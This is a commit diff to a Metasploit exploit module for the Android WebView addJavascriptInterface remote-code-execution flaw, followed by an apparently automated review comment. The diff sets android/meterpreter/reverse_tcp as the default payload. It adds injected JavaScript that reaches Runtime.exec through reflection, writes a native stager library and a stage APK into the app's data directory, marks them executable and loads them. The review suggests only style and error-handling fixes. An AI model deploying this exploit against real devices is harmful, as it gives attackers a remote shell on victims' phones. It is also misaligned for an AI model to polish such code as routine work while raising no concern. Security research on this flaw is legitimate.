native jni stager

bug/bundler_fix
Tim 2014-02-25 00:13:18 +00:00 committed by Joe Vennix
parent 4f31eba7f4
commit c76924e946
1 changed files with 24 additions and 10 deletions


@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
], ],
'Platform' => 'linux', 'Platform' => 'android',
'Arch' => ARCH_ARMLE, 'Arch' => ARCH_DALVIK,
'DefaultOptions' => { 'PrependFork' => true }, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },
'Targets' => [ [ 'Automatic', {} ] ], 'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Dec 21 2012', 'DisclosureDate' => 'Dec 21 2012',
'DefaultTarget' => 0, 'DefaultTarget' => 0,
@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
send_response_html(cli, html) send_response_html(cli, html)
end end
def dalvikstager()
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so')
data = File.read(localfile, {:mode => 'rb'})
data
end
def js def js
%Q| %Q|
function exec(obj) { function exec(obj) {
@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote
// get the runtime so we can exec // get the runtime so we can exec
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; var runtime = m.invoke(null, null);
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
// get the process name, which will give us our data path // get the process name, which will give us our data path
var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
var ch, path = '/data/data/'; var ch, path = '/data/data/';
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
path += '/#{Rex::Text.rand_text_alpha(8)}'; var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
var stagePath = path + '/stage.apk';
// build the binary, chmod it, and execute it // build the library and chmod it
m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); runtime.exec(['chmod', '700', libraryPath]).waitFor();
m.invoke(null, null).exec([path]);
// build the stage, chmod it, and load it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['chmod', '700', stagePath]).waitFor();
runtime.load(libraryPath);
return true; return true;
} }
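Review bot: The new `dalvikstager` method in the second hunk reads `libdalvikstager.so` from disk with no existence check, so a missing or unreadable data file surfaces as a bare `Errno::ENOENT` from inside `js` while a client request is being served, rather than as a clear module failure before the handler starts; if the module has a setup/`exploit` path outside this hunk, checking the path there with `fail_with` would give a usable message. The method itself is also unidiomatic: empty parens on a parameterless `def`, an explicit `{:mode => 'rb'}` hash, and a `data = ...; data` pair that does nothing, which collapses to `def dalvikstager` / `@dalvikstager ||= File.binread(File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so'))` / `end` (the memoization assumes one read per module instance is acceptable; drop the `||=` if a fresh read per request is intended). A one-line YARD comment such as `# @return [String] raw bytes of the native Dalvik stager shipped under data/android` would document what `js` embeds. In the first hunk, `'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },` carries a stray trailing comma inside the hash. The enclosing `Metasploit3` class begins before the first hunk, and `js` continues outside the third hunk.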